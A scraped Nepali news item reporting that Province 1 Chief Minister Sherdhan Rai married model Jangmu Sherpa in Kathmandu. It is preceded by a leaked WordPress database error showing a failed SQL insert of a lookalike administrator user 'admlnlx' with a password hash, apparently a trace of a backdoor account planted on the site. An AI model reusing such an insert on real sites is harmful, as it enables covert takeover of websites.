WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/KgYEfIrN2OXNGA1qd1mbApsqCoxt1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:06:30', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । प्रदेश नं. १ का मुख्यमन्त्री शेरधन राईले शेर्पा भेषमा विवाह गरेका छन् । काठमाडौँमा ५० वर्षको उमेरमा राई बेहुला भएका हुन् ।
मुख्यमन्त्री राईले २३ वर्षीया मोडल जाङ्मु शेर्पासँग विवाह गरेका हुन् । उनीहरु केही समययता प्रेम-सम्बन्धमा थिए । प्रदेश नं. १ को नाम जुराएर मात्र विवाह बन्धनमा बाँधिने बताउँदै आएका राईले आइतबार काठमाडौँको गैह्रीधारास्थित एक पार्टी प्यालेसमा बैवाहिक बन्धनमा बाँधिएका हुन् ।
विवाहमा बेहुला र बेहुली पक्ष गरी करिब ४० जनाको सहभागिता रहेको छ । विवाहमा राष्ट्रपति र प्रधानमन्त्रीसमेत सहभागी हुने कार्यक्रम तय भएको मुख्यमन्त्री निकट श्रोतले जनाएको छ ।